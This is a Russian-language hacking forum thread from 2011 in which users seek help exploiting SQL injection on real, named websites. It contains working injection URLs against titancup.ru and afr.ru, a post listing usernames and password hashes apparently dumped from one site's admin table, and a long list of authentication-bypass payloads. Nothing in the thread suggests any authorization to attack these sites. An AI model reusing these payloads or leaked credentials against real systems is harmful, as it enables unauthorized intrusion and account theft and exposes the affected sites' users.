ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.12.2011, 18:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от qaz
qaz said:
хелп, чёт никак не могу разкрутить
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+
[/COLOR][/COLOR]
Код:
Code:
http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,concat%28%28select+user%28%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--1
upd: Konqi опередил)
|
|
|
|

26.12.2011, 18:38
|
|
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме: 6183433
Репутация:
1521
|
|
Сообщение от qaz
qaz said:
хелп, чёт никак не могу разкрутить
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+
[/COLOR][/COLOR]
ts_manager_users
Daven:b7838c7f83d8197f3e46b5d88e3d5a6c
White:0d9198487f4ad5fb4407ee44b84df42c
demiurg:c16bb5217e34563e2eb9af2d9edabb6c
помойму админы
бле
опередили
|
|
|

27.12.2011, 15:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 1293
Репутация:
0
|
|
Приветствую.
В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101
Это является sql иньекцией? И можно что-то с этим сделать?
|
|
|
|

27.12.2011, 15:59
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме: 150479
Репутация:
2
|
|
Сообщение от JorryGo
JorryGo said:
Приветствую.
В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101
Это является sql иньекцией? И можно что-то с этим сделать?
Пробуй обойти авторизацию так:
admin' --
admin' #
admin'/*
' or ''='
' or 'x'='x
" or "x"="x
') or ('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
|
|
|

27.12.2011, 19:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Есть такой кусок кода
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// Check IP From IP Logging Database
[/COLOR][COLOR="#0000BB"]$get_voted_aids[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_col[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT pollip_aid FROM[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollsip[/COLOR][COLOR="#DD0000"]WHERE pollip_qid =[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND pollip_ip = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]get_ipaddress[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"'[/COLOR][COLOR="#0000BB"]$log_expiry_sql[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ?
|
|
|
|

27.12.2011, 21:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 10960
Репутация:
0
|
|
Уважаемые гуру,
Есть код, где _GET, _POST и _COOKIE "фильтруются" так:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Функция сукурити:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'security'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
}else{
if(![/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);
}else{
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?
Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?
|
|
|
|

27.12.2011, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от None
htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?
Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$get[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `test` WHERE `id`=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях.
По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя
|
|
|
|

27.12.2011, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Sql-inj такого типа раскучиваются или они не поддаются?
_http://www.afr.ru/region/303'/ob/
|
|
|
|

28.12.2011, 12:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от er9j6@
er9j6@ said:
Sql-inj такого типа раскучиваются или они не поддаются?
_http://www.afr.ru/region/303'/ob/
Скобки юзай:
http://www.afr.ru/region/(303)and(1)=(0) false
http://www.afr.ru/region/(303)and(1)=(1) true
|
|
|
|

28.12.2011, 13:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Ereee
Ereee said:
Скобки юзай:
http://www.afr.ru/region/(303)and(1)=(0) false
http://www.afr.ru/region/(303)and(1)=(1) true
Это я тоже знаю.
и, дальше как?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|